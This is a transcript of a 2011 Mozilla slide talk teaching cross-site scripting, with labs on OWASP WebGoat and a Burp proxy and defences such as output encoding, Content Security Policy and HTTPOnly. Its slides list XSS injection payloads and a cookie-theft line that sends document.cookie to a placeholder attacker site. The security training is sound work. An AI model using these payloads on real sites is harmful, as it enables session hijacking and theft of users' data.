Cross Site Scripting - Mozilla Security Learning Center

MozillaSecurityLearning CenterCross Site Scripting

Agenda• Business risk of XSS• Understanding the vulnerability• Attack scenarios• Mitigation techniques• Security enhancements

Setup• http://people.mozilla.org/~mcoates/ WebSecurityLab.html#installation• http://bit.ly/MozLab• Download Virtual Box, OWASP Broken Web App VM

Risks of XSS • Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004) • Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page • Business Impact: • Compromise of user accounts • False data displayed on website • Remote monitoring of user actions with website • Full attacker control of content displayed and served from website

XSS in the News

Fundamental Problem• Confusion between data for display and data to execute• Example: Forum message discussing JavaScript What does <script>alert(‘hi’)</script> do?

XSS Example - Intended Use(1) User submits their name Bob Name:_____ submit (2) Page displays name Hello: Bob submit

XSS Example - Attack(1) Attacker submits malicious code javascript Name:_____ submit (3) Malicious site steals passwords & installs malware(2) Code is now part of webpage <div class=”featured”> Login: ___ Pass: ____ <form action=”/en-US/firefox/ users/login” method=”post” id=”login” class=”featured-inner object-lead”> submit to evil site javascript <install malware> <div> <input type=”hidden” name=”data[Login][referer]”

XSS Points of Attack • HTML Element Content <b>Hello <script>alert(1)</script></b> • HTML Attributes <input type="text" value=" "><script>alert(1)</script> " > <input type="text" value=" "onmouseover= " alert(1) " > • JavaScript <script>x=a</script><script>alert(1);x= a</script> • CSS #Xsstc { background-image: url(about:blank#Hello%20World); } • HTML URL Parameters <a href="http://www.site.com?test= "><script>alert(1)</script><hr >

Variations • Reflected • Attack code not stored in vulnerable site • Exploit delivered via malicious link • Stored • Attack code stored in vulnerable site • User exploited by visiting vulnerable page • Dom • Client side only, no server record

WebGoat• Click First Link - OWASP WebGoat version 5.3.x• Username / Password is guest / guest

Setup• http://people.mozilla.org/~mcoates/ WebSecurityLab.html#installation• http://bit.ly/MozLab• Download Virtual Box, OWASP Broken Web App VM

Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test: “ ><script>alert(document.cookie)</script> • Cookie Theft Example: “><script>document.location=http://attackersite/ +document.cookie</script>

Lab! - Reflected XSS

Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed

Using A Proxy• Burp - Configure to listen on 8080 • Ensure “loopback only” is checked (will be by default)

Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences -> Advanced -> Network -> Settings • Set HTTP Proxy • Important - clear “No Proxy for” line

Confirm Setup Works• Refresh Web Browser - it should hang• Go to Burp -> Proxy -> Intercept (they are highlighted)• Click “Forward” for all messages• Should now see page in browser

Confirm Setup Works• Intercept is on • Each request will be caught by proxy • Requires you to hit forward each time• Intercept is off • Requests sent through proxy automatically • Logged in tab “proxy”->”history”

“Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue Attacker’s euS euS Web Proxy Web Server Browser

Lab! - Stored XSS

Stored XSS Lab• Lesson: Cross-Site Scripting->Stored XSS Attacks• Proxy Not Needed

XSS Prevention• Solution 1. Output Encoding - converts command characters to benign characters 2. Input Validation - secondary, best practice View Source: View Source: <td>test message - <td>test message - “><script>alert(docu "><script>ale ment.cookie)</ rt(document.cookie)</ script> script> </td></tr> </td></tr>

Content Security Policy (CSP) • CSP - New defensive control to eliminate XSS Name:_____ • Allows web site to specify where JavaScript can be loaded submit from • Injected JavaScript via XSS is CSP Policy rendered inert X-Content- • Violations & potential XSS Security-Policy: allow self; img-src attacks are reported to web site for investigation self data:

XSS Example with CSP(1) Attacker submits malicious code javascript Name:_____ submit(2) CSP prevents script execution (3) Site safe to use <div class=”featured”> <form action=”/en-US/firefox/ users/login” method=”post” id=”login” class=”featured-inner object-lead”> Name:_____ javascript <div> <input type=”hidden” submit name=”data[Login][referer]” value=”/en-US/developers/addons” id=”LoginReferer” /><input Violation report sent to site.com/CSPalert

Implementing CSP• Some code changes needed to externalize JavaScript• Run CSP in report only mode to test• Enable CSP and protect users with browsers supporting CSP• Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users

CSP Violation Reporting • Violations of CSP policy reported to specified URL X-Content-Security-Policy: • Acts as XSS intrusion allow self; report-uri http:// reportcollector.example.com/ detection system collector.cgi • CSP supported in portion of site users, XSS IDS benefits all • Reported data is from client, trust accordingly

CSP Violation Reporting CSP Violation javascript • Report Includes: • HTTP Request Violation report sent to site.com/CSPalert • request-headers • blocked-uri • violation-directive • original-policy

CSP Violation Report

Other CSP Benefits • Prevent ClickJacking via frame-ancestors • Control embedded frames via frame-src • Control domains for images via img-src • Control target domains via xhr-src • Enforce specific protocols (https://*.foo.com) • Future enhancement to control actions & malicious forms

Protecting Outdated Users• HTTPOnly mitigates one of XSS impacts - session hijacking• Supported in all recent browsers• Easy, opt-in security control to protect users Attacker’s Site javascript Cookie: SessionID

Summary• XSS • Untrusted user data not properly handled in response • Exists with user data in HTML, JavaScript, CSS, etc• Defensive Design • Encode for context - HTML Entity encoding, JavaScript encoding, etc • Content Security Policy - Strong layer of defense • HTTPOnly flag - Easy add for some benefits• More Info - OWASP XSS Prevention Cheat Sheet

Next Sessions• Upcoming • August 16, 2011 - Hands-On Hacking Brownbag - SQL Injection • August 25, 2011 - OWASP Bay Area Chapter Meeting• https://wiki.mozilla.org/WebAppSec#Schedule• https://blog.mozilla.com/webappsec/

http://security.ds	122
http://security.dsone.3ds.com	2
http://vsec2dsy	1

Cross Site Scripting - Mozilla Security Learning Center

by Michael Coates on Aug 16, 2011

Accessibility

Categories

Tags

Upload Details

Usage Rights

3 Embeds 125

Statistics

Cross Site Scripting - Mozilla Security Learning Center — Presentation Transcript